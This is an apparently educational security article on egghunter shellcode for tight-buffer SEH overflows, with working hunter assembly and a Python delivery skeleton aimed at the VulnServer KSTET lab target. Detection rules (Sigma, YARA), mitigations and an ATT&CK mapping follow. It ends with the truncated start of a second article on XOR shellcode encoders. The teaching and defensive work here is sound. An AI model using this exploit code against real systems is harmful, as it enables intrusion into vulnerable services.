Egghunters: Staged Payload Delivery When Buffer Space Is Tight

You’ve overwritten the SEH chain. The POP POP RET gadget drops you into a clean four-byte landing zone, the short jump carries you forward, and you count maybe 60 usable bytes before the buffer turns to garbage. Your stager is 350 bytes. That gap, between the space you control and the space your payload needs, is the entire reason egghunters exist.

An egghunter is a tiny piece of shellcode — roughly 32 bytes in its tightest form — whose only job is to walk the process’s virtual address space looking for a marker, then hand execution to whatever sits immediately after that marker. The real payload gets parked somewhere else in memory: a different request field, an HTTP header, the heap. Two stages, loosely coupled. The hunter is small enough to fit in the cramped overflow; the payload can be as large as you like, as long as it’s already resident when the hunter runs.

I’ll walk the mechanism, the two classic Windows implementations, the WoW64 wrinkle on modern Windows, and — because this is a defender’s site first — exactly how the technique lights up your telemetry.


1. Why Egghunters Exist

The technique traces back to Matt Miller (skape) and his survey of “safely searching process virtual address space.” The core insight: you can’t just dereference arbitrary addresses looking for your tag, because most of the address range is unmapped. Touch an unmapped page and you take an access violation, which by default kills the process. So the hunter needs a way to test a page for readability before it reads it.

The layout in memory looks like this:

  small overflow buffer (~32-60B)        elsewhere in the process
  +---------------------------+          +-----------------------------+
  | EGGHUNTER (the "hunter")  | --scan-> | w00tw00t + full shellcode   |
  +---------------------------+          +-----------------------------+
                                  finds the doubled tag, jmp to payload

Two preconditions, both non-negotiable:

  • At least ~32 reachable bytes to hold the hunter itself.
  • The full payload must already be in memory when the hunter executes.

That second one bites people. If the payload isn’t resident yet, the hunter scans forever and pegs one CPU core at 100%. The first time I ran a KSTET egghunter I watched the target lock a core and assumed my opcode bytes were wrong. They weren’t — I’d sent the egg-tagged payload after the trigger instead of before, so there was nothing in memory to find. The hunter was working perfectly. It just had nothing to land on.


2. The Page-Walk Problem

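x86 virtual memory is managed in 4 KB (0x1000) pages, and protection is set per page: if one byte of a page is readable, every byte in it is. A page is either mapped (readable, possibly more) or effectively unreadable (unmapped or no-access, so touching it faults). The egghunter exploits this granularity to scan efficiently and safely.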

The trick is OR DX, 0x0FFF. That instruction forces the low 12 bits of the iterator register to all-ones, snapping EDX to the last byte of the current page. A following INC EDX rolls it over to the first byte of the next page. So when a page turns out to be invalid, the hunter doesn’t crawl byte-by-byte through 4096 bad addresses; it jumps straight to the next page boundary and probes again. Inside a readable page it advances one byte at a time (INC EDX), and the syscall hunter re-runs its probe at each address before comparing the DWORD there against the tag.
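The page-skip arithmetic is easy to check outside a debugger. A minimal Python model of the two instructions acting on a 32-bit register; the function names are illustrative, not from any tool:

```python
PAGE_SIZE = 0x1000          # x86 page: 4 KB
MASK32 = 0xFFFFFFFF         # EDX is a 32-bit register


def skip_to_next_page(edx: int) -> int:
    """Model `or dx, 0x0fff` followed by `inc edx`."""
    # OR DX touches only the low 16 bits; setting the low 12 lands on the
    # last byte of the current page (the upper bits of EDX are unchanged).
    edx |= 0x0FFF
    # INC EDX rolls into the first byte of the next page, wrapping at 2**32.
    return (edx + 1) & MASK32


def pages_in_address_space() -> int:
    """Page-level probes needed to sweep the whole 32-bit space once."""
    return (MASK32 + 1) // PAGE_SIZE


print(hex(skip_to_next_page(0x00401234)))   # 0x402000
print(pages_in_address_space())             # 1048576
```

So a full sweep of unreadable space costs at most about a million page probes, versus roughly four billion if the hunter crawled unreadable pages byte by byte.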

The brief table of moving parts:

Component                 | Detail
------------------------- | ------
Memory iterator register  | EDX holds the current scan address
Page-boundary jump        | OR DX, 0x0FFF → end of page; INC EDX → start of next page
Validity probe            | A syscall (or an SEH frame) tests whether the page is readable
Egg comparison            | SCASD compares EAX to [EDI] and auto-increments EDI
Transfer to payload       | JMP EDI once both halves of the egg match

[Figure: egghunter page-walk loop (OR DX, 0x0FFF page snap, INT 0x2E probe, SCASD scan, jump to payload on egg match)]
The egghunter skips entire 4 KB pages on access violations rather than crawling byte-by-byte, keeping scan time tractable across the full virtual address space.

3. Anatomy of the Syscall Egghunter

The canonical 32-byte hunter uses the kernel as a page-validity oracle. It invokes NtAccessCheckAndAuditAlarm via the legacy INT 0x2E syscall gate and inspects the return: STATUS_ACCESS_VIOLATION (0xC0000005) means the page is bad, so skip it.

; --- 32-byte syscall egghunter (skape), egg = "w00t" ---
loop_inc_page:
    or   dx, 0x0fff        ; EDX -> last byte of current 4KB page
loop_inc_one:
    inc  edx               ; advance one byte (rolls into next page)
loop_check:
    push edx               ; save scan pointer (clobbered by syscall)
    push 0x2               ; NtAccessCheckAndAuditAlarm syscall # (x86, XP-7)
    pop  eax               ;   -> EAX = 0x2   *** verify per OS, see j00ru ***
    int  0x2e              ; legacy syscall gate
    cmp  al, 0x05          ; low byte of STATUS_ACCESS_VIOLATION (0xC0000005)?
    pop  edx               ; restore scan pointer
    je   loop_inc_page     ; bad page -> skip to next page boundary
is_egg:
    mov  eax, 0x74303077   ; "w00t"
    mov  edi, edx          ; EDI = current address
    scasd                  ; compare [EDI] to EAX, EDI += 4
    jnz  loop_inc_one      ; first half mismatch -> keep scanning
    scasd                  ; compare the *second* half of the egg
    jnz  loop_inc_one
matched:
    jmp  edi               ; EDI now points just past the doubled tag

The two SCASD instructions are doing something specific: the tag is the 4-byte value repeated twice (eight bytes total). Requiring both halves matters because the hunter carries one copy of the tag in its own MOV EAX immediate; with a single-copy tag the hunter could find itself first. The doubled match also makes a false positive vanishingly unlikely, and because SCASD auto-advances EDI, after the second success EDI already points at the byte after the egg, exactly where the payload begins. Note too that this hunter never initializes EDX: it starts scanning from whatever EDX holds on entry. Skape’s IsBadReadPtr-based variant runs 37 bytes; an NtDisplayString variant is also 32 bytes and works identically, only the syscall number differs.
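To see why the doubled tag matters, here is a toy Python model of the hunter’s loop over a sparse, hypothetical memory map (a dict of page base to page bytes). The readability check is an assumption standing in for the kernel probe: an address counts as valid only if all eight bytes the two SCASDs read are mapped. The real hunter has no step limit and spins forever; `max_steps` exists only so the sketch terminates.

```python
PAGE = 0x1000
MASK32 = 0xFFFFFFFF


def page_of(addr: int) -> int:
    return (addr & MASK32) & ~(PAGE - 1)


def readable(pages: dict, addr: int, size: int = 8) -> bool:
    """Stand-in for the validity probe: all bytes the two SCASDs read must be mapped."""
    return all(page_of(addr + i) in pages for i in range(size))


def read_dword(pages: dict, addr: int) -> int:
    raw = bytes(pages[page_of(addr + i)][(addr + i) & (PAGE - 1)] for i in range(4))
    return int.from_bytes(raw, "little")


def hunt(pages: dict, start: int, tag: bytes, max_steps: int = 1_000_000):
    """Return EDI after a doubled-tag match (address of the payload), or None."""
    egg = int.from_bytes(tag, "little")
    edx = start & MASK32
    for _ in range(max_steps):
        if not readable(pages, edx):
            edx = ((edx | 0x0FFF) + 1) & MASK32     # bad page: jump to the next one
            continue
        if read_dword(pages, edx) == egg and read_dword(pages, edx + 4) == egg:
            return (edx + 8) & MASK32               # EDI after two SCASDs
        edx = (edx + 1) & MASK32                    # mismatch: next byte
    return None


pages = {0x1000: bytearray(PAGE), 0x5000: bytearray(PAGE)}
pages[0x1000][0x10:0x14] = b"w00t"          # lone copy, like the hunter's own immediate
pages[0x5000][0x100:0x108] = b"w00tw00t"    # the real egg
print(hex(hunt(pages, 0, b"w00t")))         # 0x5108
```

The lone copy at 0x1010 is skipped because its second half doesn’t match. Remove the real egg and `hunt` returns None once `max_steps` runs out; on a real target the thread just spins, which is the 100% CPU symptom from section 1.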

Identifier                   | Value / Note
---------------------------- | ------------
Syscall                      | NtAccessCheckAndAuditAlarm
Syscall number (x86 XP–7)    | 0x02
Invocation                   | INT 0x2E
Access-violation status      | 0xC0000005 (tested with CMP AL, 0x05)
Invalid-page action          | JE loop_inc_page
Size                         | ~32 bytes

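Syscall numbers are OS-version specific. 0x02 is stable on 32-bit XP, Vista, and 7; later releases renumbered the table, and a 32-bit hunter on 64-bit Windows 10 runs under WoW64, where the XP-era assumptions break (Section 6). Always confirm the number for your exact target build against Mateusz “j00ru” Jurczyk’s tables: j00ru.vexillium.org/syscalls/nt/32/ for native x86, and j00ru.vexillium.org/syscalls/nt/64/ for the 64-bit numbers a WoW64 hunter issues.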


4. The SEH-Based Variant

Rather than ask the kernel whether a page is valid, this approach installs a temporary Structured Exception Handler, reads memory blindly, and lets faults route into the handler — which simply advances the pointer and resumes. It runs around 60 bytes, but it carries no hardcoded syscall number, so it survives OS version drift better than the syscall hunter.

; --- SEH-based egghunter (illustrative sketch; skape's version is ~60 bytes) ---
; Absolute label addresses keep this readable; a real hunter computes them
; at runtime (e.g. via a CALL) to stay position-independent.
; Register a handler so a read fault resumes scanning instead of crashing.
    push handler             ; EXCEPTION_REGISTRATION_RECORD.Handler
    push dword [fs:0]        ; .Next = current head of the SEH chain
    mov  [fs:0], esp         ; install our frame as the new chain head

    xor  edx, edx            ; scan pointer
scan_loop:
    inc  edx
    mov  edi, edx
    mov  eax, 0x74303077     ; "w00t"
    scasd                    ; read [EDI]; faults route into 'handler'
    jnz  scan_loop
    scasd                    ; confirm second half of the egg
    jnz  scan_loop
    pop  dword [fs:0]        ; restore previous SEH frame
    add  esp, 4              ; discard our Handler field
    jmp  edi                 ; transfer to payload
handler:                     ; entered on STATUS_ACCESS_VIOLATION (cdecl)
    mov  ecx, [esp + 0x0c]   ; 3rd argument: pointer to the x86 CONTEXT
    or   word [ecx + 0xa8], 0x0fff       ; CONTEXT.Edx -> last byte of the bad page
    mov  dword [ecx + 0xb8], scan_loop   ; CONTEXT.Eip -> resume at scan_loop (INC EDX)
    xor  eax, eax            ; ExceptionContinueExecution = 0
    ret
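An SEH handler finds the faulting thread’s registers in the x86 CONTEXT record passed as its third argument. The offsets used for Edx (0xA8) and Eip (0xB8) can be sanity-checked with a ctypes model of the 32-bit winnt.h layout, written out by hand here. It only computes offsets, so it runs on any OS; field names follow winnt.h, and only their sizes matter.

```python
import ctypes

u32 = ctypes.c_uint32


class FLOATING_SAVE_AREA(ctypes.Structure):
    _fields_ = [
        ("ControlWord", u32), ("StatusWord", u32), ("TagWord", u32),
        ("ErrorOffset", u32), ("ErrorSelector", u32),
        ("DataOffset", u32), ("DataSelector", u32),
        ("RegisterArea", ctypes.c_uint8 * 80),   # 8 x87 registers, 10 bytes each
        ("Spare0", u32),                          # Cr0NpxState in some SDKs
    ]


class CONTEXT_X86(ctypes.Structure):
    _fields_ = [
        ("ContextFlags", u32),
        ("Dr0", u32), ("Dr1", u32), ("Dr2", u32), ("Dr3", u32),
        ("Dr6", u32), ("Dr7", u32),
        ("FloatSave", FLOATING_SAVE_AREA),
        ("SegGs", u32), ("SegFs", u32), ("SegEs", u32), ("SegDs", u32),
        ("Edi", u32), ("Esi", u32), ("Ebx", u32), ("Edx", u32),
        ("Ecx", u32), ("Eax", u32), ("Ebp", u32), ("Eip", u32),
        ("SegCs", u32), ("EFlags", u32), ("Esp", u32), ("SegSs", u32),
        ("ExtendedRegisters", ctypes.c_uint8 * 512),
    ]


for name in ("Edx", "Eip"):
    print(name, hex(getattr(CONTEXT_X86, name).offset))   # Edx 0xa8, then Eip 0xb8
print(hex(ctypes.sizeof(CONTEXT_X86)))                    # 0x2cc
```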

Feature            | Syscall variant                         | SEH variant
------------------ | --------------------------------------- | -----------
Size               | ~32 bytes                               | ~60 bytes
Validity check     | INT 0x2E → NtAccessCheckAndAuditAlarm   | Custom FS:[0] handler
OS portability     | Fragile (syscall # changes)             | More portable
Detection surface  | INT 0x2E is glaring                     | Quieter, but installs an SEH frame

That detection-surface row matters from both chairs. The SEH hunter gets recommended as the “portable” choice, and it is, but the syscall hunter’s INT 0x2E is so rarely executed by legitimate modern user-mode code that flagging it is nearly a free win for the blue team.


[Figure: 32-byte syscall hunter (INT 0x2E, OS-specific syscall numbers) vs. 60-byte SEH hunter (custom FS:[0] fault handler)]
The syscall hunter wins on size but loses on portability; the SEH hunter avoids hardcoded syscall numbers at the cost of roughly double the byte footprint and its own SEH-frame detection surface.

5. Egg Tags and Bad Characters

The tag is a 4-byte value written twice. Common choices: w00tw00t (0x74303077), T00WT00W, b33fb33f, c0d3c0d3, ERCDERCD. Two independent constraints govern selection.

First, every byte of the hunter and the tag must avoid the vulnerable function’s bad characters: \x00, \x0A, and \x0D are the usual suspects for string-based bugs, but the set is target-specific. Profile it before you commit to a tag.

Second, and easy to forget: the doubled tag must be unique in process memory. The hunter scans upward from its starting address, so if the eight-byte egg appears anywhere it reaches before your real payload (including elsewhere in your own crafted buffer), it jumps there and executes garbage. A lone 4-byte copy is harmless, since both halves must match. Scan your buffer before sending:

def egg_is_unique(buffer: bytes, tag: bytes) -> bool:
    """True if the doubled tag (what the hunter actually matches) occurs exactly once."""
    egg = tag * 2
    first = buffer.find(egg)
    if first == -1:
        print(f"[!] egg {egg!r} not found in buffer")
        return False
    again = buffer.find(egg, first + 1)   # overlapping hits count too (e.g. tag * 3)
    if again != -1:
        print(f"[!] egg {egg!r} appears at offsets {first} and {again}")
        return False
    return True

The bad-character hunt itself is methodology, not a payload: send a known byte sequence, then diff the receiving buffer in the debugger against what you sent.

# Bad-character probe — compare against the in-memory dump in x64dbg/Immunity
allchars = bytes(range(1, 256))           # skip \x00 explicitly, test the rest
probe = b"A" * 66 + b"B" * 4 + allchars
# Any byte that is mangled, truncated, or terminates the string is "bad".

6. WoW64 and Windows 10

Run a 32-bit egghunter on 64-bit Windows 10 and the old PoCs frequently misfire — the syscall table and ABI underneath WoW64 aren’t what the XP-era hunter expects. The working approach (Corelan published a tested version) uses Heaven’s Gate: transitioning a WoW64 thread from 32-bit to 64-bit mode to issue the real syscall.

The CS segment selector reveals the mode: 0x23 for 32-bit code under WoW64, 0x33 for 64-bit. The hunter checks it, then calls through the pointer stored at FS:[0xC0] (WOW32Reserved in the 32-bit TEB), which performs the far jump into 64-bit code.

; --- WoW64 / Heaven's Gate egghunter (conceptual fragment) ---
    mov  ebx, cs            ; read code-segment selector
    cmp  bl, 0x23           ; 0x23 = 32-bit (WoW64) execution?
    ; ... stage 64-bit syscall args ...
    mov  bl, 0xc0
    call dword [fs:ebx]     ; call the WOW32Reserved pointer at FS:[0xC0] -> 64-bit transition
    cmp  al, 0x05           ; STATUS_ACCESS_VIOLATION low byte
    je   loop_inc_page

The Exploit-DB WoW64 sample (45293) pushes 0x29 as the NtAccessCheckAndAuditAlarm number on a particular Windows 10 x64 build. Don’t copy that number blindly — verify it against j00ru’s table for your build, because it’s exactly the field that breaks between releases.


7. Wiring It Into an SEH Overflow

A typical delivery rides a standard SEH overwrite: nSEH gets a short jump forward, SEH gets a POP/POP/RET gadget that returns into nSEH, the short jump skips over the SEH record, and the hunter runs from there.

[ PADDING ][ nSEH: \xEB\x06\x90\x90 ][ SEH: pop/pop/ret addr ][ egghunter ]
   ... and the egg-tagged full payload lives in a SEPARATE field/request ...
#!/usr/bin/env python3
# LAB ONLY — staged egghunter delivery skeleton (offsets/gadget are placeholders)
import socket
RHOST, RPORT = "192.168.56.20", 9999

egghunter = (                       # 32-byte syscall hunter, tag "w00t"
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
nseh = b"\xeb\x06\x90\x90"           # jmp +6 over the SEH record
seh  = b"\x42\x42\x42\x42"           # PLACEHOLDER pop/pop/ret (find per target)
egg  = b"w00tw00t"                   # tag, doubled
payload = egg + b"\x90" * 16 + b"\xcc"   # \xcc = test int3; swap for calc.exe popup in lab

trigger  = b"A" * 66 + nseh + seh + egghunter
trigger += b"C" * (1000 - len(trigger))

with socket.create_connection((RHOST, RPORT)) as s:
    s.recv(1024)                                # banner
    s.sendall(b"KSTET " + payload + b"\r\n")    # 1) stage the egg-tagged payload first
    s.recv(1024)                                # wait for the reply so the two sends aren't coalesced
    s.sendall(b"KSTET " + trigger + b"\r\n")    # 2) THEN trigger overflow + run hunter

[Figure: staged SEH overflow layout: padding, nSEH short jump, SEH POP/POP/RET gadget, egghunter, and the separately delivered egg-tagged payload]
The egg-tagged payload must arrive in a separate request before the overflow trigger is sent; reversing the order leaves the hunter scanning endlessly with nothing to find.

Order matters — payload first, trigger second. Reverse it and you get the 100% CPU loop from section 1.
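Every short branch in this chain (the \xEB\x06 in nSEH, and the hunter’s own JE/JNZ bytes) encodes a signed 8-bit displacement measured from the end of the 2-byte instruction. A small helper, hypothetical but following that x86 rule, checks those bytes instead of hand-counting:

```python
def rel8(src: int, dst: int, insn_len: int = 2) -> int:
    """Displacement byte for a short JMP/Jcc at offset `src` that should land on `dst`."""
    disp = dst - (src + insn_len)        # relative to the next instruction
    if not -128 <= disp <= 127:
        raise ValueError(f"target {dst:#x} is out of short-jump range from {src:#x}")
    return disp & 0xFF                   # two's-complement byte


# nSEH at offset 0: skip its 2 remaining bytes plus the 4-byte SEH field.
print(f"{rel8(0, 8):#04x}")              # 0x06 -> \xEB\x06
# The hunter's JE at offset 15 loops back to offset 0 (or dx, 0x0fff).
print(f"{rel8(15, 0):#04x}")             # 0xef
```

The same call reproduces the hunter’s two JNZ bytes (0xEA from offset 25, 0xE7 from offset 28, both back to the INC EDX at offset 5).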


8. Lab: VulnServer KSTET

VulnServer’s KSTET command is the standard teaching target: its overflow leaves a constrained buffer that naturally forces a staged approach. The workflow:

  1. Attach VulnServer in Immunity Debugger or x64dbg.
  2. Fuzz KSTET, find the offset to SEH control with a cyclic pattern.
  3. Locate a clean POP/POP/RET in a non-/SAFESEH, non-ASLR module.
  4. Generate the hunter with mona: !mona egg -t w00t (-c enables mona’s optional checksum routine; it does not strip bad characters, so audit the generated bytes against your list). Mona can emit both SEH-based and NtAccessCheckAndAuditAlarm-based hunters.
  5. Set a breakpoint on the SCASD (\xAF) opcode and single-step to watch EDI march toward the egg — this is the moment that makes the mechanism click.
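Step 2’s cyclic pattern is simple enough to sketch. This mirrors the widely used Metasploit-style layout (uppercase, lowercase, digit triplets: Aa0Aa1…), in which a 4-byte window identifies its own offset at practical lengths; the function names are illustrative, not Metasploit’s API.

```python
import string


def cyclic_pattern(length: int) -> str:
    """Upper/lower/digit triplets (Aa0Aa1...), truncated to `length` characters."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern tops out at 20280 characters")


def pattern_offset(eip: int, length: int = 20280) -> int:
    """Offset of the 4 bytes seen in EIP (little-endian) inside the pattern, or -1."""
    needle = eip.to_bytes(4, "little").decode("ascii", errors="replace")
    return cyclic_pattern(length).find(needle)


print(cyclic_pattern(12))                # Aa0Aa1Aa2Aa3
```

In practice you send `cyclic_pattern(n)`, read the overwritten value from the debugger, and pass it to `pattern_offset`.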

Read the manual assembly alongside mona’s output. Treat mona as a generator, not a black box. Use a calc.exe/cmd.exe popup as the test payload — never real C2.


9. Detecting Egghunter Behavior

The hunter is loud if you’re listening. Two behavioral tells lead:

  • A single thread pegged at 100%, particularly right after a crash-and-recover on a network service — the symptom of a hunter scanning with no resident payload.
  • NtAccessCheckAndAuditAlarm fired thousands of times in rapid succession, which no legitimate user-mode workload does. It surfaces in ETW syscall traces.
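The second tell turns into a heuristic once you have syscall-level events. A minimal sketch, assuming a hypothetical stream of (timestamp_seconds, thread_id, syscall_name) tuples, time-ordered per thread, exported from whatever kernel tracing you have; the threshold and window are placeholders to tune against your own baseline:

```python
from collections import defaultdict, deque


def find_syscall_bursts(events, syscall="NtAccessCheckAndAuditAlarm",
                        threshold=1000, window=1.0):
    """Return thread IDs that issued `syscall` >= `threshold` times within `window` seconds."""
    recent = defaultdict(deque)          # thread_id -> timestamps inside the window
    flagged = set()
    for ts, tid, name in events:
        if name != syscall:
            continue
        stamps = recent[tid]
        stamps.append(ts)
        while ts - stamps[0] > window:   # drop calls older than the window
            stamps.popleft()
        if len(stamps) >= threshold:
            flagged.add(tid)
    return flagged


hunter = [(i * 0.0001, 4242, "NtAccessCheckAndAuditAlarm") for i in range(5000)]
normal = [(i * 0.5, 1337, "NtAccessCheckAndAuditAlarm") for i in range(10)]
print(find_syscall_bursts(hunter + normal))   # {4242}
```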

Event ID | Name                | Relevance
-------- | ------------------- | ---------
1        | Process Creation    | Baseline parent-child chain for the vulnerable service
8        | CreateRemoteThread  | Egg payload injecting; StartModule/StartFunction empty when the start address is outside loaded modules, a shellcode tell
10       | ProcessAccess       | Cross-process handles requesting PROCESS_VM_WRITE (0x0020), PROCESS_VM_OPERATION (0x0008), PROCESS_CREATE_THREAD (0x0002)
25       | ProcessTampering    | Sysmon 13+; in-memory image diverging from disk, a hallmark of in-memory execution

The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, so out of the box it won’t log CreateRemoteThread injection whose thread starts in kernel32.dll (the LoadLibrary pattern). Tune it before you rely on Event ID 8.

title: Remote Thread Start Address Outside Loaded Modules
id: 5a9d3e21-6a3f-4c11-9f0a-2b7c8d41e6f0
status: experimental
logsource:
  product: windows
  category: create_remote_thread     # Sysmon Event ID 8
detection:
  selection:
    StartModule: ''
    StartFunction: ''
  condition: selection
level: high

Pair that with Microsoft-Windows-Threat-Intelligence ETW (fires on WriteProcessMemory/CreateRemoteThread, needs PPL to consume) and audit policy: auditpol /set /subcategory:"Process Creation" /success:enable yields Security Event 4688, and the command line appears in it only once the “Include command line in process creation events” policy is also enabled. And flag INT 0x2E in user mode wherever EDR or ETW lets you; it’s about as high-fidelity as indicators get.

YARA pins the syscall hunter’s opcode signature for memory forensics:

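rule Egghunter_Syscall_x86 {
    meta:
        description = "skape NtAccessCheckAndAuditAlarm egghunter (~32 bytes)"
        author = "GenXCyber"
    strings:
        $page_walk = { 66 81 CA FF 0F }            // or dx, 0x0fff
        $probe     = { CD 2E 3C 05 }               // int 0x2e ; cmp al, 0x05
        $egg_check = { AF 75 ?? AF 75 ?? FF E7 }   // scasd; jnz; scasd; jnz; jmp edi
    condition:
        // all pieces inside one 32-byte window that starts at a page walk
        for any i in (1..#page_walk) : (
            $probe in (@page_walk[i] .. @page_walk[i] + 32) and
            $egg_check in (@page_walk[i] .. @page_walk[i] + 32)
        )
}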
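Where YARA isn’t available (a quick triage script over a raw memory dump, say), the canonical byte window can be matched with a regular expression. This sketch wildcards the syscall number, the tag, and the branch displacements; it only covers the canonical skape layout, not reordered or encoded variants.

```python
import re

# or dx,0x0fff; inc edx; push edx; push <syscall#>; pop eax; int 0x2e;
# cmp al,5; pop edx; je <rel8>; mov eax,<tag>; mov edi,edx; scasd; jnz; scasd; jnz; jmp edi
HUNTER_RE = re.compile(
    rb"\x66\x81\xca\xff\x0f\x42\x52\x6a(.)\x58\xcd\x2e\x3c\x05\x5a\x74."
    rb"\xb8(.{4})\x8b\xfa\xaf\x75.\xaf\x75.\xff\xe7",
    re.DOTALL,                      # '.' must match any byte, including \n
)


def find_egghunters(dump: bytes):
    """Yield (offset, syscall_number, tag) for each canonical hunter in `dump`."""
    for m in HUNTER_RE.finditer(dump):
        yield m.start(), m.group(1)[0], m.group(2)


sample = bytes.fromhex("6681caff0f42526a0258cd2e3c055a74efb8773030748bfaaf75eaaf75e7ffe7")
print(list(find_egghunters(b"\x90" * 100 + sample)))   # [(100, 2, b'w00t')]
```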

10. Tools for Egghunter Analysis

Tool                   | Description                                               | Link
---------------------- | --------------------------------------------------------- | ----
mona.py                | Generates/verifies egghunters (!mona egg) in Immunity     | corelan.be
Immunity Debugger      | Classic exploit-dev debugger, mona host                    | immunityinc.com
x64dbg                 | Free user-mode debugger for stepping the scan              | x64dbg.com
VulnServer             | Safe, intentionally vulnerable practice target             | github.com
Process Hacker         | Spot the 100% CPU thread and handle access                 | processhacker.sourceforge.io
Sysmon                 | EID 8/10/25 telemetry for shellcode behavior               | microsoft.com
j00ru syscall table    | Authoritative per-OS syscall numbers                       | j00ru.vexillium.org
osed-scripts (epi052)  | Egghunter generator and OSED helpers                       | github.com

11. Mitigations and Modern Reality

Egghunters were a 32-bit-era staple, and modern defenses have narrowed their utility considerably.

Mitigation            | Effect on the technique
--------------------- | -----------------------
DEP / NX              | Payload on stack/heap won’t execute; primary kill switch for legacy targets
ASLR                  | Hardcoded POP/POP/RET addresses break; forces wider scans → more CPU and ETW noise
Control Flow Guard    | Validates indirect call targets in CFG-compiled code; it doesn’t instrument the hunter’s own JMP EDI, but can block a hijack routed through a protected indirect call
GS / stack canaries   | Don’t stop the hunter, but can stop the overflow that delivers it
App sandboxing        | Limits post-execution blast radius

The technique still earns its place in OSED-style coursework and against unhardened legacy 32-bit software — which is exactly where you find it in real engagements.


12. MITRE ATT&CK Mapping

Egghunters are delivery scaffolding, not a post-exploitation tactic. There’s no ATT&CK sub-technique for “egghunter,” and you shouldn’t invent one. It sits upstream of the payload, in the exploitation-and-loading layer. Map the surrounding behavior:

Technique                                            | MITRE ID   | Detection
---------------------------------------------------- | ---------- | ---------
Exploitation for Client Execution                    | T1203      | Service crash/recover, EID 1 anomalies
Process Injection                                    | T1055      | Sysmon EID 8/10, TI ETW
Process Injection: Dynamic-link Library Injection    | T1055.001  | EID 8 with empty StartModule
Reflective Code Loading                              | T1620      | In-memory PE, EID 25 ProcessTampering
Obfuscated Files or Information                      | T1027      | Encoded egg payload, YARA on decoder stubs
Virtualization/Sandbox Evasion: Time Based Evasion   | T1497.003  | CPU-spike artifact in sandboxes

Summary

  • An egghunter is a ~32-byte stage-1 stub that scans process memory for a doubled tag and jumps to the stage-2 payload — the answer to “my buffer is too small for real shellcode.”
  • The hunter walks memory page-by-page (OR DX, 0x0FFF), validates each page via NtAccessCheckAndAuditAlarm/INT 0x2E (or an SEH frame), and confirms the egg with two consecutive SCASD instructions before JMP EDI.
  • The payload must already be resident when the hunter runs; otherwise it loops and pegs a CPU core — a behavioral indicator in its own right.
  • Syscall numbers are OS-version specific (verify against j00ru) and WoW64 needs Heaven’s Gate, so portability is the real-world friction.
  • Detect it via the INT 0x2E anomaly, rapid NtAccessCheckAndAuditAlarm bursts, Sysmon EID 8 threads with empty StartModule, EID 25 tampering, and a YARA signature on the canonical opcode window — and mitigate upstream with DEP, ASLR, and CFG.


Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars

You found the overflow. You control EIP. Your execve("/bin/sh") payload runs perfectly in the debugger — and then dies the moment it crosses the wire. Nine times out of ten the culprit is a single byte the transport or a string routine refused to carry intact. A \x00 that strcpy treated as end-of-string. A \x0a the protocol parser read as newline. The fix isn’t a better payload; it’s an encoder that launders the offending bytes out, plus a tiny decoder that rebuilds the original at runtime.

This walks through XOR encoding end to end — the byte math, a Python encoder, a position-independent decoder stub in x86 NASM, a per-chunk keyed variant, stack-based decoding, and what shikata_ga_nai adds on top. Every stub here decodes a benign exit(0) payload. The point is to understand the mechanism well enough to detect and defend against it, so the final third is all blue team.


1. Why Shellcode Breaks: Bad Characters

A bad character is any byte value the delivery path mangles, truncates, or drops before your shellcode lands in executable memory intact. The constraint comes from the vulnerability, not from the payload.

Byte   | Name             | Why it breaks things
------ | ---------------- | --------------------
\x00   | NULL             | Terminates C strings; strcpy/sprintf stop copying here
\x0a   | Line Feed        | Read as end-of-input by line-oriented protocols and gets()
\x0d   | Carriage Return  | Paired with \x0a in HTTP/SMTP headers; often stripped
\x20   | Space            | Token delimiter in many parsers
\xff   | 0xFF             | Sentinel / length markers in some binary protocols

The list is per target. A web exploit might tolerate \x00 (the buffer isn’t a C string) but choke on \x26 (&) because of URL parsing. You don’t guess — you measure (Section 3).


2. The XOR Contract

XOR is the canonical encoding operation for one reason: it’s its own inverse. XOR a byte with a key, XOR the result with the same key, and you’re back where you started.

A ⊕ K ⊕ K = A

A | K | A ⊕ K
- | - | -----
0 | 0 | 0
0 | 1 | 1
1 | 0 | 1
1 | 1 | 0

There’s no key schedule, no S-box, no state to carry, which matters because every byte of decoder stub is a byte that isn’t shellcode. A single-byte XOR decoder fits in about 20 bytes; the JMP-CALL-POP stub in Section 5 is exactly 20. That economy is why it shows up in real tooling and why analysts learn to recognize its shape on sight.

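The encoder’s job is to pick a key K such that original_byte ⊕ K is never a bad character, for every byte in the payload. If a candidate key produces even one collision, throw it away and try the next. Note that any payload byte equal to K encodes to \x00, so whenever \x00 is bad, K must differ from every byte in the payload. And K itself is embedded in the decoder stub as an immediate, so it can’t be a bad character either.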
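Both rules are quick to confirm in Python. This sketch re-declares the benign exit(0) bytes from Section 4 so it stands alone, and shows why key 0x01 is rejected: the payload contains a 0x01 byte, which encodes to \x00. The `collisions` helper is illustrative.

```python
EXIT0 = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])   # x86 exit(0)
BAD = {0x00, 0x0a, 0x0d}

# XOR is its own inverse for every byte/key pair.
assert all((a ^ k) ^ k == a for a in range(256) for k in range(256))


def collisions(shellcode: bytes, key: int, bad: set):
    """List (index, original, encoded) for every byte that encodes to a bad char."""
    return [(i, b, b ^ key) for i, b in enumerate(shellcode) if (b ^ key) in bad]


print(collisions(EXIT0, 0x01, BAD))   # [(3, 1, 0)]
print(collisions(EXIT0, 0x02, BAD))   # []
```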


[Figure: key search and XOR encoding, hostile transport, decode by the stub, execution on the target]
XOR encoding and decoding are symmetric operations: the same key byte transforms the payload in both directions, so only a tiny stub is needed at runtime.

3. Finding the Bad Chars

Before you encode anything, you enumerate what to avoid. The workflow is mechanical:

  1. Build a test pattern of all 256 byte values, \x00 through \xff, minus any you already know are bad.
  2. Drop it into the vulnerable buffer and dump the buffer from memory.
  3. Diff the dump against what you sent. The first byte that’s wrong (mangled, missing, or where the copy stopped) is a bad char.
  4. Add it to the list, regenerate the pattern without it, repeat until the whole pattern survives byte-for-byte.

A small diff helper makes step 3 fast:

#!/usr/bin/env python3
# Bad-char scanner: compare what you sent vs. what landed in memory.
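def first_bad(expected: bytes, received: bytes):
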